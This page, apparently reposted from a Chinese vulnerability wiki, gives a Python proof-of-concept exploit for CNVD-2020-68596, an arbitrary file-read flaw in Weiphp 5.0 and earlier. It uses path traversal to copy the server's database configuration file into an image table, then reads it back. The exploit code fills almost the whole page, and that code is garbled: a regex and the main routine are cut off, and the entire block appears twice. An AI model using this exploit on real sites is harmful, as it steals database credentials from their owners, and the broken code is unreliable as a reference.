# CNVD-2020-68596 Weiphp5.0 前台文件任意讀取漏洞
Weiphp <= 5.0
==POC==
#!/usr/bin/python3 #-*- coding:utf-8 -*- # author : PeiQi # from : http://wiki.peiqi.tech import requests import random import re def title(): print('+------------------------------------------') print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m') print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m') print('+ \033[34m公众号 : PeiQi文库 \033[0m') \033[0m') print('+ \033[34mVersion: Weiphp5.0 \033[0m') print('+ \033[36m使用格式: python3 poc.py \033[0m') print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m') print('+------------------------------------------') def POC_1(target_url): upload_url = target_url + "/public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36" } data = { "1":1 } try: response = requests.post(url=upload_url, headers=headers, data=data, timeout=20) if response.status_code == 200: print("\033[32m[o] 成功将 database.php文件 写入Pictrue表中\033[0m") else: print("\033[31m[x] 漏洞利用失败 \033[0m") except: print("\033[31m[x] 漏洞利用失败 \033[0m") def POC_2(target_url): vnln_url = target_url + "/public/index.php/home/file/user_pics" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36" } try: response = requests.get(url=vnln_url, headers=headers).text href = re.findall(r'>> \033[0m")) POC_1(target_url) image_url = POC_2(target_url)
Weiphp <= 5.0
==POC==
#!/usr/bin/python3 #-*- coding:utf-8 -*- # author : PeiQi # from : http://wiki.peiqi.tech import requests import random import re def title(): print('+------------------------------------------') print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m') print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m') print('+ \033[34m公众号 : PeiQi文库 \033[0m') \033[0m') print('+ \033[34mVersion: Weiphp5.0 \033[0m') print('+ \033[36m使用格式: python3 poc.py \033[0m') print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m') print('+------------------------------------------') def POC_1(target_url): upload_url = target_url + "/public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36" } data = { "1":1 } try: response = requests.post(url=upload_url, headers=headers, data=data, timeout=20) if response.status_code == 200: print("\033[32m[o] 成功将 database.php文件 写入Pictrue表中\033[0m") else: print("\033[31m[x] 漏洞利用失败 \033[0m") except: print("\033[31m[x] 漏洞利用失败 \033[0m") def POC_2(target_url): vnln_url = target_url + "/public/index.php/home/file/user_pics" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36" } try: response = requests.get(url=vnln_url, headers=headers).text href = re.findall(r'>> \033[0m")) POC_1(target_url) image_url = POC_2(target_url)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容